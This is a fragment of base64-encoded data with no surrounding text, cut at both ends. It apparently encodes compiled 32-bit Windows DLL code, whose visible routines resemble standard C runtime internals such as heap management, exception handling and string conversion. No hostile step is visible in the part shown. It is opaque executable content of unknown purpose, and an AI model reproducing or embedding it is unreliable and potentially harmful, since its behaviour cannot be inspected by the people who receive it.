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N/DPN6CmW///Jw4v/VYvsg+wQ/3UIjU3w6DSY////dSSNTfD/dSD/dRz/dRj/dRT/dRD/dQzoFv7//4PEHIB9/AB0B4tN+INhcP3Jw4v/VYvsVot1CIX2D4SBAQAA/3YE6Die////dgjoMJ7///92DOgonv///3YQ6CCe////dhToGJ7///92GOgQnv///zboCZ7///92IOgBnv///3Yk6Pmd////dijo8Z3///92LOjpnf///3Yw6OGd////djTo2Z3///92HOjRnf///3Y46Mmd////djzowZ3//4PEQP92QOi2nf///3ZE6K6d////dkjopp3///92TOienf///3ZQ6Jad////dlTojp3///92WOiGnf///3Zc6H6d////dmDodp3///92ZOhunf///3Zo6Gad////dmzoXp3///92cOhWnf///3Z06E6d////dnjoRp3///92fOg+nf//g8RA/7aAAAAA6DCd////toQAAADoJZ3///+2iAAAAOganf///7aMAAAA6A+d////tpAAAADoBJ3///+2lAAAAOj5nP///7aYAAAA6O6c////tpwAAADo45z///+2oAAAAOjYnP///7akAAAA6M2c////tqgAAADowpz//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFYFoBEHQHUOifnP//WYtGBDsFZFoBEHQHUOiNnP//WYt2CDs1aFoBEHQHVuh7nP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BWxaARB0B1DoWZz//1mLRhA7BXBaARB0B1DoR5z//1mLRhQ7BXRaARB0B1DoNZz//1mLRhg7BXhaARB0B1DoI5z//1mLRhw7BXxaARB0B1DoEZz//1mLRiA7BYBaARB0B1Do/5v//1mLdiQ7NYRaARB0B1bo7Zv//1leXcOL/1WL7ItFCFMz21ZXO8N0B4t9DDv7dxvo4KH//2oWXokwU1NTU1PoaaH//4PEFIvG6zyLdRA783UEiBjr2ovQOBp0BEJPdfg7+3Tuig6ICkJGOst0A0918zv7dRCIGOiZof//aiJZiQiL8eu1M8BfXltdw8zMzMzMVYvsVjPAUFBQUFBQUFCLVQyNSQCKAgrAdAmDwgEPqwQk6/GLdQiDyf+NSQCDwQGKBgrAdAmDxgEPowQkc+6LwYPEIF7Jw4v/VYvsU1aLdQgz21c5XRR1EDvzdRA5XQx1EjPAX15bXcM783QHi30MO/t3G+gMof//ahZeiTBTU1NTU+iVoP//g8QUi8br1TldFHUEiB7ryotVEDvTdQSIHuvRg30U/4vGdQ+KCogIQEI6y3QeT3Xz6xmKCogIQEI6y3QIT3QF/00Ude45XRR1AogYO/t1i4N9FP91D4tFDGpQiFwG/1jpeP///4ge6JKg//9qIlmJCIvx64LMzMzMzFWL7FYzwFBQUFBQUFBQi1UMjUkAigIKwHQJg8IBD6sEJOvxi3UIi/+KBgrAdAyDxgEPowQkc/GNRv+DxCBeycOL/1WL7IPsEP91CI1N8OjRk///g30U/30EM8DrEv91GP91FP91EP91DP8VLAEBEIB9/AB0B4tN+INhcP3Jw4v/VYvsUVGLRQxWi3UIiUX4i0UQV1aJRfzoph4AAIPP/1k7x3UR6Nuf///HAAkAAACLx4vX60r/dRSNTfxR/3X4UP8VNAEBEIlF+DvHdRP/FRwAARCFwHQJUOjNn///WevPi8bB+AWLBIUgewEQg+YfweYGjUQwBIAg/YtF+ItV/F9eycNqFGhIMQEQ6MHc//+Dzv+JddyJdeCLRQiD+P51HOhyn///gyAA6Fef///HAAkAAACLxovW6dAAAAAz/zvHfAg7BQh7ARByIehIn///iTjoLp///8cACQAAAFdXV1dX6Lae//+DxBTryIvIwfkFjRyNIHsBEIvwg+YfweYGiwsPvkwxBIPhAXUm6Aef//+JOOjtnv//xwAJAAAAV1dXV1fodZ7//4PEFIPK/4vC61tQ6AIeAABZiX38iwP2RDAEAXQc/3UU/3UQ/3UM/3UI6Kn+//+DxBCJRdyJVeDrGuifnv//xwAJAAAA6Kee//+JOINN3P+DTeD/x0X8/v///+gMAAAAi0Xci1Xg6ATc///D/3UI6D8eAABZw4v/VYvsuOQaAADoJR8AAKEcUAEQM8WJRfyLRQxWM/aJhTTl//+JtTjl//+JtTDl//85dRB1BzPA6ekGAAA7xnUn6DWe//+JMOgbnv//VlZWVlbHABYAAADoo53//4PEFIPI/+m+BgAAU1eLfQiLx8H4BY00hSB7ARCLBoPnH8HnBgPHilgkAtvQ+4m1KOX//4idJ+X//4D7AnQFgPsBdTCLTRD30fbBAXUm6Myd//8z9okw6LCd//9WVlZWVscAFgAAAOg4nf//g8QU6UMGAAD2QAQgdBFqAmoAagD/dQjofv3//4PEEP91COhpBwAAWYXAD4SdAgAAiwb2RAcEgA+EkAIAAOiwr///i0BsM8k5SBSNhRzl//8PlMFQiwb/NAeJjSDl////FUABARCFwA+EYAIAADPJOY0g5f//dAiE2w+EUAIAAP8VPAEBEIudNOX//4mFHOX//zPAiYU85f//OUUQD4ZCBQAAiYVE5f//ioUn5f//hMAPhWcBAACKC4u1KOX//zPAgPkKD5TAiYUg5f//iwYDx4N4OAB0FYpQNIhV9IhN9YNgOABqAo1F9FDrSw++wVDoC5H//1mFwHQ6i4005f//K8sDTRAzwEA7yA+GpQEAAGoCjYVA5f//U1DokgsAAIPEDIP4/w+EsQQAAEP/hUTl///rG2oBU42FQOX//1DobgsAAIPEDIP4/w+EjQQAADPAUFBqBY1N9FFqAY2NQOX//1FQ/7Uc5f//Q/+FROX///8V3AABEIvwhfYPhFwEAABqAI2FPOX//1BWjUX0UIuFKOX//4sA/zQH/xU4AQEQhcAPhCkEAACLhUTl//+LjTDl//8DwTm1POX//4mFOOX//w+MFQQAAIO9IOX//wAPhM0AAABqAI2FPOX//1BqAY1F9FCLhSjl//+LAMZF9A3/NAf/FTgBARCFwA+E0AMAAIO9POX//wEPjM8DAAD/hTDl////hTjl///pgwAAADwBdAQ8AnUhD7czM8lmg/4KD5TBQ0ODhUTl//8CibVA5f//iY0g5f//PAF0BDwCdVL/tUDl///oQxsAAFlmO4VA5f//D4VoAwAAg4U45f//AoO9IOX//wB0KWoNWFCJhUDl///oFhsAAFlmO4VA5f//D4U7AwAA/4U45f///4Uw5f//i0UQOYVE5f//D4L5/f//6ScDAACLDooT/4U45f//iFQPNIsOiUQPOOkOAwAAM8mLBgPH9kAEgA+EvwIAAIuFNOX//4mNQOX//4TbD4XKAAAAiYU85f//OU0QD4YgAwAA6waLtSjl//+LjTzl//+DpUTl//8AK4005f//jYVI5f//O00QczmLlTzl////hTzl//+KEkGA+gp1EP+FMOX//8YADUD/hUTl//+IEED/hUTl//+BvUTl////EwAAcsKL2I2FSOX//yvYagCNhSzl//9QU42FSOX//1CLBv80B/8VOAEBEIXAD4RCAgAAi4Us5f//AYU45f//O8MPjDoCAACLhTzl//8rhTTl//87RRAPgkz////pIAIAAImFROX//4D7Ag+F0QAAADlNEA+GTQIAAOsGi7Uo5f//i41E5f//g6U85f//ACuNNOX//42FSOX//ztNEHNGi5VE5f//g4VE5f//Ag+3EkFBZoP6CnUWg4Uw5f//AmoNW2aJGEBAg4U85f//AoOFPOX//wJmiRBAQIG9POX///4TAABytYvYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xU4AQEQhcAPhGIBAACLhSzl//8BhTjl//87ww+MWgEAAIuFROX//yuFNOX//ztFEA+CP////+lAAQAAOU0QD4Z8AQAAi41E5f//g6U85f//ACuNNOX//2oCjYVI+f//XjtNEHM8i5VE5f//D7cSAbVE5f//A85mg/oKdQ5qDVtmiRgDxgG1POX//wG1POX//2aJEAPGgb085f//qAYAAHK/M/ZWVmhVDQA